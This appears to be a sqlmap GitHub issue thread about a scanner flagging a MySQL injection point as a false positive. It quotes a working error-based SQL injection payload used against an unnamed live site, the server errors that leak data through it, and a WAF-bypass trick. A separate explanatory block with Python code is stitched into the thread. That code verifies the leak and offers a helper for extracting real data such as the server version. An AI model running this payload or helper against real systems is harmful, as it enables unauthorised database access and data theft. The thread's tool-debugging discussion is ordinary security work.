Closed WilliJoin closed 10 years ago
Read this: A) "heuristic (basic) test shows that GET parameter 'page' might be injectable" B) "unexploitable injection point detected"
In lots of cases there is a WAF that blocks exploitation. sqlmap can't say that something is vulnerable to SQLi while it's not (at least with the used options/switches).
Also, ...in 90% of cases the heuristic (basic) test is not wrong...
Whenever you find out by yourself MANUALLY that sqlmap is wrong and you have a working SQLi payload, please feel free to report it. Otherwise, please don't open this kind of issue.
Yes, I found it manually. In `GET /id='` I get the error:

```
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'thumb' AND fi_id IS NOT NULL AND ' at line 5
SERVER DATA:
```

In `GET /id='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(51)%2cCHAR(116)%2cCHAR(56)%2cCHAR(103)%2cCHAR(120)%2cCHAR(55)%2cCHAR(97)%2cCHAR(120))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'` I get the error:

```
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '4Cu3t8gx7ax1' for key 'group_key'
SERVER DATA
```

sqlmap says:

```
[10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:27:45] [INFO] testing for SQL injection on GET parameter 'id'
[10:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:27:51] [WARNING] reflective value(s) found and filtering out
[10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
.....
[10:38:38] [WARNING] false positive or unexploitable injection point detected
```
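The payload and the 1062 error quoted in the post above are the classic MySQL "double query" error-based technique: the injected subquery's result is concatenated with `floor(rand(0)*2)` and used as a `GROUP BY` key, and the seeded `rand(0)` makes MySQL collide on that key and leak the value inside the `Duplicate entry` message. The following is an added example (not code from this issue or from the sqlmap project) showing how to confirm by hand that the error really comes from your injected marker: it decodes the `CHAR()`-built string hidden in the GET value, pulls the leaked value out of the error text, and checks that the two match. The payload and error strings embedded below are constructed copies of the ones in the post, with `count(*)` and `rand(0)*2` restored where the issue's markdown rendering turned the asterisks into underscores; `build_double_query` is an illustrative helper, not a sqlmap function.

```python
"""Manual check of a MySQL double-query (rand(0)/group by) error-based injection.

Added example; not code from the sqlmap issue or from the sqlmap project.
It decodes the CHAR() marker a scanner hid in the payload and recovers the value
leaked through the 1062 "Duplicate entry" error, so you can confirm that the
error is caused by your injected subquery and not by something unrelated.
"""
import re
from urllib.parse import unquote

# Constructed sample: the GET value from the thread, with count(*) and rand(0)*2
# restored where the issue's markdown rendering turned the asterisks into '_'.
POSTED_PAYLOAD = (
    "'and(select%201%20from(select%20count(*)%2cconcat((select%20concat("
    "CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(51)%2cCHAR(116)%2cCHAR(56)%2c"
    "CHAR(103)%2cCHAR(120)%2cCHAR(55)%2cCHAR(97)%2cCHAR(120))%20from%20"
    "information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20"
    "from%20information_schema.tables%20group%20by%20x)a)and'"
)

# Constructed sample: the 1062 error the reporter quoted for that payload.
POSTED_ERROR = ("SQLSTATE[23000]: Integrity constraint violation: 1062 "
                "Duplicate entry '4Cu3t8gx7ax1' for key 'group_key'")

# A run of CHAR(..) calls, either concat(CHAR(52),CHAR(67),...) or CHAR(52,67,...).
CHAR_RUN = re.compile(r"(?:CHAR\(\s*\d+(?:\s*,\s*\d+)*\s*\)\s*,?\s*)+", re.IGNORECASE)
CHAR_CALL = re.compile(r"CHAR\(([\d\s,]+)\)", re.IGNORECASE)
DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key '([^']*)'")


def char_literals(sql):
    """Return every string that the CHAR() runs in `sql` would build.

    Scanners use CHAR() to smuggle a marker past quote filters; decoding it tells
    you what to look for in the server's error message.
    """
    found = []
    for run in CHAR_RUN.finditer(sql):
        codes = [int(n) for call in CHAR_CALL.finditer(run.group(0))
                 for n in call.group(1).split(",") if n.strip()]
        found.append("".join(chr(c) for c in codes))
    return found


def marker_from_payload(url_encoded):
    """Decode a URL-encoded GET value and return the CHAR()-built markers in it."""
    return char_literals(unquote(url_encoded))


def leaked_value(error_message):
    """Recover the subquery result carried by a 1062 error from the double-query trick.

    The group key is concat(<value>, floor(rand(0)*2)). rand(0) is seeded, so the
    colliding key MySQL reports is <value> followed by '1' (as in the thread:
    '4Cu3t8gx7ax1'); strip that digit to get the value back.
    """
    m = DUP_ENTRY.search(error_message)
    if not m or not m.group(1).endswith("1"):
        return None
    return m.group(1)[:-1]


def error_caused_by_payload(url_encoded, error_message):
    """True when the value leaked in the error is exactly a marker the payload injected."""
    value = leaked_value(error_message)
    return value is not None and value in marker_from_payload(url_encoded)


def build_double_query(scalar_subquery, table="information_schema.tables"):
    """Illustrative helper: wrap any scalar subquery in the same rand(0)/group by shape.

    Once the marker round-trip has proven the point is live, swap the marker for
    e.g. "select @@version" to leak real data through the same error.
    """
    return ("and(select 1 from(select count(*),concat((%s),floor(rand(0)*2))x "
            "from %s group by x)a)" % (scalar_subquery, table))


if __name__ == "__main__":
    print("marker in payload :", marker_from_payload(POSTED_PAYLOAD))
    print("value in error    :", leaked_value(POSTED_ERROR))
    print("same injection?   :", error_caused_by_payload(POSTED_PAYLOAD, POSTED_ERROR))
    print(build_double_query("select @@version"))
```

If `error_caused_by_payload` returns True, the 1062 error is provably produced by your subquery and you have the "working SQLi payload" the maintainer asks for; if the marker does not come back in the error, the error is noise from the application and not evidence of an exploitable point.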
`and(select` <- this looks like a WAF bypass trick. You've copy/pasted this from somewhere, right?
After an unsuccessful exploit with sqlmap, I put `/id='` (this SQLi) into Acunetix and it gave me this `and(select` payload.
Usage of `(` for WAF bypass is hard to implement as it is context sensitive. Acunetix has a predefined set of payloads to check, so it doesn't have to bother with their proper working.
Why, if in 90% of cases the heuristic (basic) test is not wrong, can't sqlmap find the SQLi? The SQLi exists but sqlmap can't exploit it?

```
[06:00:45] [INFO] heuristic (basic) test shows that GET parameter 'page' might be injectable (possible DBMS: 'MySQL')
......
[08:22:04] [WARNING] GET parameter 'page' is not injectable
```

```
[10:27:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:27:45] [INFO] testing for SQL injection on GET parameter 'id'
[10:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:27:51] [WARNING] reflective value(s) found and filtering out
[10:28:02] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
.....
[10:38:38] [WARNING] false positive or unexploitable injection point detected
```